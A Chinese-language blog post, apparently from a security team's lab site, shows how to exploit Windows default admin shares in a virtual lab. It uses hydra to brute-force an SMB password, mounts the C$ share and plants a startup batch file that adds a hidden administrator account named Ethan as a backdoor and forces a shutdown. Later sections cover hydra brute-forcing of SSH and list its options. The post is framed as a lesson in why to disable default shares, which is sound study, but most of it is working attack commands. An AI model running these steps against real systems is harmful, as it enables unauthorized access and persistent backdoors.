可能是最全的windows默认共享风险利用
我是安全界的小学生,之前写了一篇“ windows彻底关闭默认共享 ”,但是一直未研究“为什么要关闭?不关闭能咋地?”,最近进行了一次验证实验,探索了默认共享会带来的危害,加深了对默认共享的理解,闲言少叙,主戳主题:
1、个人PC(后面都称作本机)
2、虚拟机上windows服务器 192.168.67.128
3、hydra工具:进行暴力破解
1、本机状态
2、windows服务器状态
3、在本机输入命令:net use k: \\192.168.67.128\c$
结果:
输入已破解用户的用户名和密码,比如:Administrator password
如果密码错误,使用hydra进行破解:( 附上hydra使用方法 )
命令为:hydra -l administrator -P pass.txt 192.168.67.128 smb
破解结果:发现密码是123456
然后再进行登录:登录成功
4、在查看本机,会发现多了一个k盘(为windows服务器c盘的映射)
5、在开机启动项里添加批处理文件
先写一个批处理文件:
copy con 111.bat
net user Ethan 123456 /add
net localgroup Administrators Ethan /add
shutdown -s -t 180 -c "hello man,your PC has been hacked by Ethan!!!"
复制到桌面和启动下面:
6、 当对方重启服务器、或者出于好奇,打开桌面的.bat文件时 :弹出关机提示,同时新建Ethan用户。
查看,已经创建新的Ethan超级管理员账户
此时,如果对方未发现Ethan用户,就算修改administrator用户,仍然有Ethan用户作为后门。
7、如果服务器开启了远程桌面,也可以使用Ethan账户进行远程桌面登录。
成功:
关于windows默认共享问题,要想利用,首先需要服务器开了共享,其次是知道对方的用户名和口令,所以还是要注意修改默认用户名,并加强口令复杂度。
如果不需要, 彻底关闭默认共享 。
我是安全界的小学生,欢迎大家批评指导。
hydra暴力破解SSH密码
在linux环境下,使用hydra,借助跑字典的方式,暴力破解ssh密码。(建议在虚拟机中自行搭建被暴力目标)
安装hydra
准备字典,例如,可以自己写几个密码,其中包含一个正确密码,命名为ssh_password.txt
运行破解过程
当密码正确时,会自动停止。
尝试登录,ssh默认记录登录日志,包括失败的。日志存放目录/var/log/auth.log
阅读:
linux日志管理
Linux下暴力破解工具Hydra详解
【原创】使用Hydra暴力破解网络协议密码
Hydra是一款全能的暴力破解工具,功能强大,几乎支持所有的协议。本次实验使用Hydra爆破SSH登陆密码;
参数说明
hydra [[[-l login|-L file] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]
[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w time] [-f] [-s PORT] [-S] [-vV] server service [OPT]
-R 继续从上一次进度接着破解。
-S 采用SSL链接。
-s PORT 可通过这个参数指定非默认端口。
-l LOGIN 指定破解的用户,对特定用户破解。
-L FILE 指定用户名字典。
-p PASS 小写,指定密码破解,少用,一般是采用密码字典。
-P FILE 大写,指定密码字典。
-e ns 可选选项,n:空密码试探,s:使用指定用户和密码试探。
-C FILE 使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数。
-M FILE 指定目标列表文件一行一条。
-o FILE 指定结果输出文件。
-f 在使用-M参数以后,找到第一对登录名或者密码的时候中止破解。
-t TASKS 同时运行的线程数,默认为16。
-w TIME 设置最大超时的时间,单位秒,默认是30s。
-v / -V 显示详细过程。
server 目标ip
service 指定服务名,支持的服务和协议:telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http-{head|get}
http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener
postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh smtp-auth[-ntlm] pcanywhere
teamspeak sip vmauthd firebird ncp afp等等。
实验过程
受害主机:192.168.1.103
受害用户:root
1.我们需要知道受害主机的ssh用户,例如root。接下来,我们需要准备一个密码字典,为了节省时间,我们使用了一个简单的密码字典,其中包含了root@192.168.1.103的正确密码;
2.在终端中输入: hydra 192.168.1.103 ssh -l root -P ./Documents/password.txt -V 并回车;
随后Hydra根据字典的内容进行逐个尝试,并在全部尝试完成之后显示爆破结果。
Safesonic网络安全团队实验室2016年08月21日
0条大神的评论